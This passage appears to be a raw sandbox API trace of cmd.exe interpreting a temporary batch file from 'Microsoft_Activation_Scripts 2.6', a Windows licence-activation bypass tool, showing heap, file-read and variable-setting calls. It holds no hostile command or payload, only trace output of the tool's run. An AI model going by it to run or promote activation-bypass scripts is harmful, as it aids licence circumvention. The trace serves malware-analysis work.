lpValue="C:\\Windows\\Temp\\MAS_15344413.cmd") returned 1 [0177.439] GetProcessHeap () returned 0x19a8f1e0000 [0177.439] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f204690) returned 1 [0177.439] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0177.440] GetProcessHeap () returned 0x19a8f1e0000 [0177.440] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xeaa) returned 0x19a8f2038a0 [0177.440] memcpy (in: _Dst=0x19a8f2038a0, _Src=0x19a8f2029e0, _Size=0xeaa | out: _Dst=0x19a8f2038a0) returned 0x19a8f2038a0 [0177.440] FreeEnvironmentStringsA (penv="=") returned 1 [0177.440] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.440] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.440] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.440] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.441] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.441] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.442] SetConsoleInputExeNameW () returned 0x1 [0177.442] GetConsoleOutputCP () returned 0x1b5 [0177.443] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.443] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.444] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.444] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.444] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.444] SetFilePointer (in: hFile=0x84, lDistanceToMove=4626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0177.444] GetProcessHeap () returned 0x19a8f1e0000 [0177.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef9a0) returned 1 [0177.445] GetProcessHeap () returned 0x19a8f1e0000 [0177.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0177.445] GetProcessHeap () returned 0x19a8f1e0000 [0177.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.445] GetProcessHeap () returned 0x19a8f1e0000 [0177.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0177.445] GetProcessHeap () returned 0x19a8f1e0000 [0177.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0177.445] GetProcessHeap () returned 0x19a8f1e0000 [0177.446] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ca0) returned 1 [0177.446] GetProcessHeap () returned 0x19a8f1e0000 [0177.446] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0177.446] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.446] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0177.446] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.446] SetFilePointer (in: hFile=0x84, lDistanceToMove=4652, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0177.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_batp=%_batf:'=''%\"\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_batp=%_batf:'=''%\"\r\n\"_work=%_work:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 26 [0177.446] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.446] GetFileType (hFile=0x84) returned 0x1 [0177.447] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.447] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0177.447] GetProcessHeap () returned 0x19a8f1e0000 [0177.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f204760 [0177.447] GetProcessHeap () returned 0x19a8f1e0000 [0177.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f208780 [0177.447] GetProcessHeap () returned 0x19a8f1e0000 [0177.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0177.447] GetEnvironmentVariableW (in: lpName="_batf", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x20 [0177.447] _wcsnicmp (_String1="C", _String2="'", _MaxCount=0x1) returned 60 [0177.447] _wcsnicmp (_String1=":", _String2="'", _MaxCount=0x1) returned 19 [0177.447] _wcsnicmp (_String1="\\", _String2="'", _MaxCount=0x1) returned 53 [0177.447] _wcsnicmp (_String1="W", _String2="'", _MaxCount=0x1) returned 80 [0177.447] _wcsnicmp (_String1="i", _String2="'", _MaxCount=0x1) returned 66 [0177.447] _wcsnicmp (_String1="n", _String2="'", _MaxCount=0x1) returned 71 [0177.447] _wcsnicmp (_String1="d", _String2="'", _MaxCount=0x1) returned 61 [0177.448] _wcsnicmp (_String1="o", _String2="'", _MaxCount=0x1) returned 72 [0177.448] _wcsnicmp (_String1="w", _String2="'", _MaxCount=0x1) returned 80 [0177.448] _wcsnicmp (_String1="s", _String2="'", _MaxCount=0x1) returned 76 [0177.448] _wcsnicmp (_String1="\\", _String2="'", _MaxCount=0x1) returned 53 [0177.448] _wcsnicmp (_String1="T", _String2="'", _MaxCount=0x1) returned 77 [0177.448] _wcsnicmp (_String1="e", _String2="'", _MaxCount=0x1) returned 62 [0177.448] _wcsnicmp (_String1="m", _String2="'", _MaxCount=0x1) returned 70 [0177.448] _wcsnicmp (_String1="p", _String2="'", _MaxCount=0x1) returned 73 [0177.448] _wcsnicmp (_String1="\\", _String2="'", _MaxCount=0x1) returned 53 [0177.448] _wcsnicmp (_String1="M", _String2="'", _MaxCount=0x1) returned 70 [0177.448] _wcsnicmp (_String1="A", _String2="'", _MaxCount=0x1) returned 58 [0177.448] _wcsnicmp (_String1="S", _String2="'", _MaxCount=0x1) returned 76 [0177.448] _wcsnicmp (_String1="_", _String2="'", _MaxCount=0x1) returned 56 [0177.448] _wcsnicmp (_String1="1", _String2="'", _MaxCount=0x1) returned 10 [0177.448] _wcsnicmp (_String1="5", _String2="'", _MaxCount=0x1) returned 14 [0177.448] _wcsnicmp (_String1="3", _String2="'", _MaxCount=0x1) returned 12 [0177.448] _wcsnicmp (_String1="4", _String2="'", _MaxCount=0x1) returned 13 [0177.448] _wcsnicmp (_String1="4", _String2="'", _MaxCount=0x1) returned 13 [0177.448] _wcsnicmp (_String1="4", _String2="'", _MaxCount=0x1) returned 13 [0177.448] _wcsnicmp (_String1="1", _String2="'", _MaxCount=0x1) returned 10 [0177.448] _wcsnicmp (_String1="3", _String2="'", _MaxCount=0x1) returned 12 [0177.448] _wcsnicmp (_String1=".", _String2="'", _MaxCount=0x1) returned 7 [0177.448] _wcsnicmp (_String1="c", _String2="'", _MaxCount=0x1) returned 60 [0177.448] _wcsnicmp (_String1="m", _String2="'", _MaxCount=0x1) returned 70 [0177.448] _wcsnicmp (_String1="d", _String2="'", _MaxCount=0x1) returned 61 [0177.449] _wcsnicmp (_String1="", _String2="'", _MaxCount=0x1) returned -39 [0177.449] GetProcessHeap () returned 0x19a8f1e0000 [0177.449] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.449] GetProcessHeap () returned 0x19a8f1e0000 [0177.449] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f208780) returned 1 [0177.449] GetProcessHeap () returned 0x19a8f1e0000 [0177.450] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f204760) returned 1 [0177.450] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.450] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.450] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.450] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.450] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.450] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.450] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.450] GetProcessHeap () returned 0x19a8f1e0000 [0177.450] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.450] GetProcessHeap () returned 0x19a8f1e0000 [0177.450] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd40 [0177.451] GetProcessHeap () returned 0x19a8f1e0000 [0177.451] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaed0 [0177.451] _tell (_FileHandle=3) returned 4652 [0177.451] _close (_FileHandle=3) returned 0 [0177.451] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.451] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.451] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.451] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.451] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.451] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.451] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.451] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.451] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.451] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.451] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.451] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.452] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.452] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.452] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.452] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.452] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.452] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.452] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.452] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.453] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.453] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.453] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.453] GetProcessHeap () returned 0x19a8f1e0000 [0177.453] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb8) returned 0x19a8f1ee190 [0177.453] GetProcessHeap () returned 0x19a8f1e0000 [0177.453] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ee190, Size=0x64) returned 0x19a8f1eaf40 [0177.453] GetProcessHeap () returned 0x19a8f1e0000 [0177.453] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaf40) returned 0x64 [0177.453] wcsncmp (_String1="\"_ba", _String2="/", _MaxCount=0x4) returned -13 [0177.453] GetProcessHeap () returned 0x19a8f1e0000 [0177.453] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1eeba0 [0177.453] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.453] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.453] SetEnvironmentVariableW (lpName="_batp", lpValue="C:\\Windows\\Temp\\MAS_15344413.cmd") returned 1 [0177.454] GetProcessHeap () returned 0x19a8f1e0000 [0177.454] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2038a0) returned 1 [0177.454] GetEnvironmentStringsW () returned 0x19a8f1ffdd0* [0177.454] GetProcessHeap () returned 0x19a8f1e0000 [0177.454] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xef8) returned 0x19a8f2029e0 [0177.454] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f1ffdd0, _Size=0xef8 | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0177.454] FreeEnvironmentStringsA (penv="=") returned 1 [0177.454] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.454] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.455] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.455] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.456] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.456] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.457] SetConsoleInputExeNameW () returned 0x1 [0177.457] GetConsoleOutputCP () returned 0x1b5 [0177.457] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.457] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.458] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.459] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.459] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.459] SetFilePointer (in: hFile=0x84, lDistanceToMove=4652, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0177.459] GetProcessHeap () returned 0x19a8f1e0000 [0177.460] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeba0) returned 1 [0177.460] GetProcessHeap () returned 0x19a8f1e0000 [0177.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0177.461] GetProcessHeap () returned 0x19a8f1e0000 [0177.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0177.461] GetProcessHeap () returned 0x19a8f1e0000 [0177.462] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0177.462] GetProcessHeap () returned 0x19a8f1e0000 [0177.462] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.463] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.463] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0177.463] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.463] SetFilePointer (in: hFile=0x84, lDistanceToMove=4654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0177.463] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"_batp=%_batf:'=''%\"\r\n\"_work=%_work:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 2 [0177.463] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.463] GetFileType (hFile=0x84) returned 0x1 [0177.463] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.463] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0177.463] GetProcessHeap () returned 0x19a8f1e0000 [0177.463] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205660 [0177.464] GetProcessHeap () returned 0x19a8f1e0000 [0177.464] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205660) returned 1 [0177.465] _tell (_FileHandle=3) returned 4654 [0177.465] _close (_FileHandle=3) returned 0 [0177.465] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.465] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.465] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.465] SetFilePointer (in: hFile=0x84, lDistanceToMove=4654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0177.466] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0177.466] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=4689, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0177.466] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _PSarg=\"\"\"%~f0\"\"\" -el %_args%\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _PSarg=\"\"\"%~f0\"\"\" -el %_args%\r\nwork:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 35 [0177.466] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.466] GetFileType (hFile=0x84) returned 0x1 [0177.466] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0177.466] GetProcessHeap () returned 0x19a8f1e0000 [0177.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205660 [0177.467] GetProcessHeap () returned 0x19a8f1e0000 [0177.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f86a0 [0177.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x208, lpBuffer=0x43f9efe920, lpFilePart=0x43f9efe480 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efe480*="MAS_15344413.cmd") returned 0x20 [0177.467] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x7, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8a00 [0177.468] FindClose (in: hFindFile=0x19a8f1f8a00 | out: hFindFile=0x19a8f1f8a00) returned 1 [0177.468] memcpy (in: _Dst=0x43f9efe926, _Src=0x43f9efe1dc, _Size=0xe | out: _Dst=0x43f9efe926) returned 0x43f9efe926 [0177.468] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x7, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f8880 [0177.468] FindClose (in: hFindFile=0x19a8f1f8880 | out: hFindFile=0x19a8f1f8880) returned 1 [0177.468] memcpy (in: _Dst=0x43f9efe936, _Src=0x43f9efe1dc, _Size=0x8 | out: _Dst=0x43f9efe936) returned 0x43f9efe936 [0177.468] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee, dwReserved0=0x0, dwReserved1=0x7, cFileName="MAS_15344413.cmd", cAlternateFileName="MAS_15~1.CMD")) returned 0x19a8f1f8be0 [0177.468] FindClose (in: hFindFile=0x19a8f1f8be0 | out: hFindFile=0x19a8f1f8be0) returned 1 [0177.468] _wcsnicmp (_String1="MAS_15~1.CMD", _String2="MAS_15344413.cmd", _MaxCount=0x10) returned 75 [0177.468] memcpy (in: _Dst=0x43f9efe940, _Src=0x43f9efe1dc, _Size=0x20 | out: _Dst=0x43f9efe940) returned 0x43f9efe940 [0177.468] GetProcessHeap () returned 0x19a8f1e0000 [0177.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x52) returned 0x19a8f1f8760 [0177.469] GetProcessHeap () returned 0x19a8f1e0000 [0177.469] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f209680 [0177.469] GetProcessHeap () returned 0x19a8f1e0000 [0177.469] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0177.469] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.469] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0177.469] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0177.469] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0177.469] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0177.469] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0177.469] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0177.469] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0177.469] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0177.469] GetProcessHeap () returned 0x19a8f1e0000 [0177.469] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.469] GetProcessHeap () returned 0x19a8f1e0000 [0177.470] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209680) returned 1 [0177.470] GetProcessHeap () returned 0x19a8f1e0000 [0177.471] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205660) returned 1 [0177.472] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.472] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.472] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.472] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.472] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.472] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.472] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.472] GetProcessHeap () returned 0x19a8f1e0000 [0177.472] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0177.472] GetProcessHeap () returned 0x19a8f1e0000 [0177.472] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7c0 [0177.472] GetProcessHeap () returned 0x19a8f1e0000 [0177.472] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x78) returned 0x19a8f1ef2a0 [0177.472] _tell (_FileHandle=3) returned 4689 [0177.472] _close (_FileHandle=3) returned 0 [0177.472] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.472] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.472] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.472] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.473] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.473] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.473] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.473] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.473] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.473] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.473] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.473] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.475] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.475] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.475] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.475] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.475] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.475] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.475] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.475] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.475] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.475] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.475] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.475] GetProcessHeap () returned 0x19a8f1e0000 [0177.475] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xe0) returned 0x19a8f1fc200 [0177.475] GetProcessHeap () returned 0x19a8f1e0000 [0177.475] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fc200, Size=0x76) returned 0x19a8f1eee20 [0177.475] GetProcessHeap () returned 0x19a8f1e0000 [0177.475] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eee20) returned 0x76 [0177.475] wcsncmp (_String1="_PSa", _String2="/", _MaxCount=0x4) returned 48 [0177.475] GetProcessHeap () returned 0x19a8f1e0000 [0177.476] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x80) returned 0x19a8f1eaed0 [0177.476] _wcsnicmp (_String1="_P", _String2="/A", _MaxCount=0x2) returned 48 